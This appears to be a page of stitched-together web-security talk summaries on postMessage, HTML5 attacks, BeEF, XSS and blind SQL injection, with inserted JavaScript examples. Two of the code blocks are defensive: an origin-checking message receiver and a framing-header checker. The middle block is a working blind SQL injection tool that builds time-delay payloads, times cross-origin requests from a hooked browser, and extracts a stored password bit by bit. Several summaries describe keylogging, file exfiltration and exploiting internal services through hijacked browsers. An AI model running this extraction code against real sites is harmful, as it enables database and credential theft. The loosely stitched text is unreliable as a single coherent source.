This document discusses using iframes, postMessage, and localStorage for communication in a sandboxed web application platform. It notes both advantages and disadvantages of iframes, describes how to securely communicate between iframes and different browser tabs or windows using postMessage, and explores strategies and considerations for using localStorage for communication.
The document provides an overview of secure web messaging in HTML5. It discusses how earlier communication methods like JavaScript, AJAX, and frames were limited by the same-origin policy. The HTML5 postMessage API lets documents belonging to different principals (origins) exchange messages explicitly, without relaxing the same-origin policy itself. While more secure than previous workarounds, postMessage still requires an explicit target origin when sending, an origin check and validation of the data when receiving, and mitigation of framing attacks; without these it can lead to issues such as cross-site scripting.
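The sender and receiver discipline described in the two summaries above (iframe communication via postMessage, and the secure-messaging overview), as an added example that is not code from either document. The origins, the message type `setTheme` and the `applyTheme` sink are assumptions for illustration; the weak origin check is included because it is the bug that turns an origin check into no check at all.

```javascript
// Added example: a postMessage receiver that pins the sender origin and validates
// the payload, beside the weak patterns it replaces. Origins and message types are
// assumed for illustration.

const ALLOWED_ORIGINS = new Set([
  'https://app.example',     // assumed: the parent page
  'https://widget.example',  // assumed: an embedded widget frame
]);

// WEAK: a substring check accepts https://app.example.attacker.test and
// https://attacker.test/?x=app.example. An origin is an opaque string; compare it exactly.
function weakOriginCheck(origin) {
  return origin.indexOf('app.example') !== -1;
}

function isAllowedOrigin(origin) {
  return ALLOWED_ORIGINS.has(origin);
}

// Receiver side. Returns a verdict object so the logic can be exercised without a
// browser; in a page you would register it with
// window.addEventListener('message', makeMessageHandler(applyTheme)).
function makeMessageHandler(applyTheme) {
  return function onMessage(event) {
    // 1. Who sent it? event.origin is filled in by the browser, not by the sender.
    if (!isAllowedOrigin(event.origin)) {
      return { accepted: false, reason: 'untrusted origin ' + event.origin };
    }
    // 2. event.data is untrusted input: parse it, never eval() it or write it as HTML.
    let msg = event.data;
    if (typeof msg === 'string') {
      try { msg = JSON.parse(msg); } catch (e) { return { accepted: false, reason: 'not JSON' }; }
    }
    if (msg === null || typeof msg !== 'object' || typeof msg.type !== 'string') {
      return { accepted: false, reason: 'bad envelope' };
    }
    // 3. Dispatch on an allow-list of message types, with per-type value checks.
    switch (msg.type) {
      case 'setTheme':
        if (msg.value !== 'light' && msg.value !== 'dark') {
          return { accepted: false, reason: 'bad theme value' };
        }
        applyTheme(msg.value);
        return { accepted: true, type: msg.type };
      default:
        return { accepted: false, reason: 'unknown type ' + msg.type };
    }
  };
}

// Sender side. The second argument is the only origin the message may be delivered to;
// '*' hands it to whatever document currently occupies the frame.
function sendToFrame(targetWindow, msg, targetOrigin) {
  if (targetOrigin === '*') {
    throw new Error('refusing to send with targetOrigin "*"');
  }
  targetWindow.postMessage(JSON.stringify(msg), targetOrigin);
}

// Constructed events shaped like what the browser hands to a message listener.
function demo() {
  const applied = [];
  const handler = makeMessageHandler((theme) => applied.push(theme));
  const results = [
    handler({ origin: 'https://attacker.test', data: '{"type":"setTheme","value":"dark"}' }),
    handler({ origin: 'https://app.example', data: '<img src=x onerror=alert(1)>' }),
    handler({ origin: 'https://app.example', data: '{"type":"setTheme","value":"dark"}' }),
    handler({ origin: 'https://widget.example', data: { type: 'eval', value: 'alert(1)' } }),
  ];
  return { results, applied };
}
```

Only the third constructed event is accepted: the first fails the origin check, the second is not a parseable message, and the fourth names a type the receiver does not know. Checking `event.origin` with `startsWith`, `indexOf` or a loose regex is the most common way this check is defeated, which is why the exact-match `Set` lookup is used.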
Slides of my talk at RuxCon 2013: For those who do not listen to Mayhem and black metal, the talk title might seem a bit weird, and I can't blame you. You know the boundaries of the Same Origin Policy, you know SQL injection and time delays, you know BeEF. You also know that when sending cross-domain XHRs you can still monitor the timing of the response: you might want to infer 0 or 1 bits depending on whether the response was delayed or not. This means it's possible to exploit every kind of SQL injection, blind or not, through a hooked browser, if you can inject a time delay and monitor the response timing. You don't need a 0day or a particular SOP bypass to do this, and it works in every browser. The potential of being faster than a normal single-host multi-threaded SQLi dumper will be explored. Two experiments will be shown: WebWorkers as well as multiple synched hooked browsers, which split the workload, communicating partial results to a central server. A pure JavaScript approach will be exclusively presented during this talk, including live demos. Such an approach would work for both internet-facing targets as well as applications available in the intranet of the hooked browser. The talk will finish by discussing the implications of such an approach in terms of Incident Response and Forensics, showing evidence of a very small footprint.
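The bit-by-bit timing extraction the abstract above describes, as an added example that is not the talk's own code. The endpoint, the injected subquery, the baseline and delay values, and the simulated server are all assumptions; the simulated endpoint stands in for a vulnerable page so the extraction loop can run offline.

```javascript
// Added example: blind SQL injection through a timing side channel from a hooked browser.
// A cross-origin XHR response is opaque to the attacker, but its duration is not: the
// injected query adds a delay only when the tested bit is 1, so each request leaks one bit.
// QUERY, BASELINE_MS, DELAY_MS and simulatedEndpoint are assumptions for illustration.

const BASELINE_MS = 120;   // assumed normal round trip; measure it on the real target first
const DELAY_MS = 2000;     // delay asked of the database (SLEEP(2))
const QUERY = 'SELECT password FROM users LIMIT 1';   // assumed attacker-chosen subquery

// MySQL-style payload: delay only if bit `bit` of character `pos` (1-based) is set.
function buildPayload(query, pos, bit, delaySec) {
  return `' AND IF((ASCII(SUBSTRING((${query}),${pos},1))>>${bit})&1, SLEEP(${delaySec}), 0)-- -`;
}

// Decode one measurement: anything past the midpoint of the injected delay is a 1.
function bitFromTiming(elapsedMs, baselineMs, delayMs) {
  return elapsedMs >= baselineMs + delayMs / 2 ? 1 : 0;
}

// Browser side (not exercised offline): time a cross-origin request whether or not the
// response is readable. onloadend fires for both a successful load and a CORS failure.
function timeCrossOriginRequest(url) {
  return new Promise((resolve) => {
    const xhr = new XMLHttpRequest();
    const t0 = performance.now();
    xhr.onloadend = () => resolve(performance.now() - t0);
    xhr.open('GET', url);
    xhr.send();
  });
}

// Reassemble one 7-bit ASCII character from seven timed requests.
// `measure(payload)` returns the observed round trip in milliseconds.
function extractChar(measure, pos) {
  let code = 0;
  for (let bit = 6; bit >= 0; bit--) {
    const elapsed = measure(buildPayload(QUERY, pos, bit, DELAY_MS / 1000));
    code |= bitFromTiming(elapsed, BASELINE_MS, DELAY_MS) << bit;
  }
  return String.fromCharCode(code);
}

function extractString(measure, length) {
  let out = '';
  for (let pos = 1; pos <= length; pos++) out += extractChar(measure, pos);
  return out;
}

// Constructed stand-in for the vulnerable endpoint: evaluates the payload the way the
// database would and returns a fake round trip with deterministic jitter.
function simulatedEndpoint(secret) {
  let calls = 0;
  return function measure(payload) {
    const m = /SUBSTRING\(\(.*?\),(\d+),1\)\)>>(\d+)\)&1, SLEEP\((\d+)\)/.exec(payload);
    if (!m) throw new Error('unexpected payload: ' + payload);
    const pos = Number(m[1]), bit = Number(m[2]), sleepSec = Number(m[3]);
    const ch = pos <= secret.length ? secret.charCodeAt(pos - 1) : 0;
    const jitter = (calls++ % 7) * 15;           // 0..90 ms, well below DELAY_MS / 2
    return BASELINE_MS + jitter + (((ch >> bit) & 1) ? sleepSec * 1000 : 0);
  };
}
```

Each character costs seven requests, and every request that hits a 1 bit waits the full injected delay, which is why the abstract talks about splitting the work across WebWorkers or several hooked browsers. The threshold at half the delay is what makes the decode tolerant of ordinary network jitter; if the measured baseline varies by more than that, raise the delay rather than lowering the threshold.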
The document discusses cross-site scripting (XSS) attacks that can occur outside of web browsers on desktop and mobile platforms. It provides examples of XSS vulnerabilities found in Skype, Adium, Android's Gmail app, Google Earth, and outlines a tool built to automate discovery and exfiltration of files across platforms like Mac, Android and others. The document encourages developers to properly filter HTML and secure apps from XSS attacks.
The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
This document discusses various web application attacks and protections. It covers Cross Site Scripting (XSS), Universal Cross Site Scripting, Cross Site Request Forgery (CSRF) and the Same Origin Policy, together with related attacks such as SQL injection, browser-based port scanning, cache poisoning and prototype hijacking. The document also discusses how to conduct "blind" SQL injection attacks when error messages are not returned.
This document discusses several HTML5-based attacks that could be used to compromise a target named Bob. It describes using filejacking to access files on Bob's computer, poisoning Bob's app cache to gain persistent access, performing silent file uploads to plant incriminating evidence, using UI redressing to trick Bob into actions, and extracting sensitive information from Bob's employer's internal sites using drag-and-drop content extraction. The document provides proof-of-concept demos and notes limitations but emphasizes that HTML5 expands attack possibilities against unaware users. It concludes by encouraging developers to implement proper defenses like X-Frame-Options to prevent framing attacks.
Video recording of the talk: https://connect.ruhr-uni-bochum.de/p3g2butmrt4/ HTML5 is quickly gaining media attention and popularity among browser vendors and web developers. Having tremendous features, together with its sister specifications like Drag & Drop API, File API or Geolocation it allows developers to build rich web applications that easily blend with desktop & mobile environments. The talk will be focused on finding the weakest link and combining several recent attack techniques to turn a security vulnerability into a successful exploit. We'll show how to build a successful advanced UI-Redressing attack (also known as clickjacking), presenting the latest findings in this field, including malicious games and quizzes. We'll work on file upload functionalities in current web applications and see how attackers might use HTML5 APIs for their advantage. Putting all these building blocks together will enable us to launch an attack and exploit even the otherwise unexploitable vulnerabilities.
The document discusses security issues that can occur on the web front end, including cross-site scripting (XSS), cross-site request forgery (CSRF), and hijacking. It covers how the same-origin policy works and can be relaxed through mechanisms like document.domain and CORS. Specific types of XSS like persistent and DOM-based XSS are described. The document also discusses CSRF, hijacking techniques like clickjacking, and methods for finding vulnerabilities like XSS filtering and fuzzing. Defensive techniques like X-Frame-Options, Content Security Policy, HTTPS, and CSRF tokens are recommended.
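The framing defences named above (X-Frame-Options and Content Security Policy, which the HTML5-attacks summary earlier on this page also recommends against UI redressing), as an added example that is not code from either document: a check that decides from a response's headers whether a page may be framed by a given origin. The header values and origins in the demo are constructed; ports in CSP sources are ignored for brevity.

```javascript
// Added example: does this response let `framerOrigin` put the page at `pageOrigin`
// in a frame? Mirrors browser behaviour: a frame-ancestors directive, when present,
// takes precedence and X-Frame-Options is ignored; ALLOW-FROM is not honoured by
// current browsers. Header values and origins below are constructed.

function parseOrigin(origin) {
  const m = /^([a-z][a-z0-9+.-]*):\/\/([^/:]+)(?::(\d+))?$/i.exec(origin);
  if (!m) throw new Error('not an origin: ' + origin);
  return { scheme: m[1].toLowerCase(), host: m[2].toLowerCase(), port: m[3] || '' };
}

// Match one CSP source expression: 'none', 'self', *, https://*.example, example.
// Port components are ignored (assumption for brevity).
function sourceMatches(source, framerOrigin, pageOrigin) {
  const src = source.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return framerOrigin === pageOrigin;
  if (src === '*') return true;
  const f = parseOrigin(framerOrigin);
  let scheme = null, hostPart = src;
  const i = src.indexOf('://');
  if (i !== -1) { scheme = src.slice(0, i); hostPart = src.slice(i + 3); }
  if (scheme && scheme !== f.scheme) return false;
  // A scheme-less source matches the page's own scheme, or https as an upgrade.
  if (!scheme && f.scheme !== parseOrigin(pageOrigin).scheme && f.scheme !== 'https') return false;
  if (hostPart.startsWith('*.')) return f.host.endsWith(hostPart.slice(1)); // *.a.example: x.a.example, not a.example
  return f.host === hostPart;
}

function getHeader(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name.toLowerCase());
  return key === undefined ? null : headers[key];
}

function framingAllowed(headers, framerOrigin, pageOrigin) {
  const csp = getHeader(headers, 'Content-Security-Policy');
  if (csp) {
    const directive = csp.split(';').map((d) => d.trim()).find((d) => /^frame-ancestors\b/i.test(d));
    if (directive) {
      // An empty source list means 'none'; X-Frame-Options is ignored from here on.
      const sources = directive.split(/\s+/).slice(1);
      return sources.some((s) => sourceMatches(s, framerOrigin, pageOrigin));
    }
  }
  const xfo = getHeader(headers, 'X-Frame-Options');
  if (xfo) {
    const v = xfo.trim().toUpperCase();
    if (v === 'DENY') return false;
    if (v === 'SAMEORIGIN') return framerOrigin === pageOrigin;
    // ALLOW-FROM and unrecognised values: browsers ignore the header, so no protection.
  }
  return true;   // no framing restriction at all
}

// Constructed responses and origins.
function demo() {
  const page = 'https://bank.example';
  return {
    unprotected: framingAllowed({ 'Content-Type': 'text/html' }, 'https://attacker.test', page),
    xfoDeny: framingAllowed({ 'X-Frame-Options': 'DENY' }, page, page),
    xfoSameOrigin: framingAllowed({ 'x-frame-options': 'SAMEORIGIN' }, 'https://attacker.test', page),
    cspPartner: framingAllowed(
      { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self' https://*.partner.example" },
      'https://portal.partner.example', page),
    cspLookalike: framingAllowed(
      { 'Content-Security-Policy': "frame-ancestors 'self' https://*.partner.example" },
      'https://partner.example.attacker.test', page),
    cspOverridesXfo: framingAllowed(
      { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': 'frame-ancestors *' },
      'https://attacker.test', page),
  };
}
```

The last case is the one to watch for in reviews: a permissive `frame-ancestors` silently cancels a `DENY` that someone added earlier, because browsers stop consulting X-Frame-Options once the CSP directive is present. Shipping both is still the right call for old clients, as long as the two agree.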
Outline:
What the hell is BeEF?
✴ Cutting: target enumeration and analysis
✴ Devouring: internal net fingerprint; exploiting internal services through the hooked browser; keylogging, browser pwnage
✴ Digesting: persistence; tunneling sqlmap/Burp through BeEF proxy; XSSrays integration
✴ Future development and ideas
This document outlines an agenda for a presentation on web application attacks. The presentation will demonstrate common vulnerabilities like unvalidated parameters, access control flaws, session management issues, cross-site scripting, injection flaws, improper error handling, AJAX security issues, authentication flaws, code quality issues, concurrency problems, and parameter tampering. It lists tools that will be used like WebGoat and WebScarab and provides references for further information.
This document discusses the Browser Exploitation Framework (BeEF), which allows penetration testers to target browsers within different security contexts and select modules in real-time to exploit vulnerabilities. It outlines how BeEF can be used to enumerate targets, fingerprint internal networks by detecting devices from their images, exploit services like JBoss via the browser, persistently keylog victims, tunnel network requests through the browser as a proxy, and integrate the XssRays module to detect cross-site scripting vulnerabilities. Future development ideas include improving XssRays and adding multi-hooked browser support.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.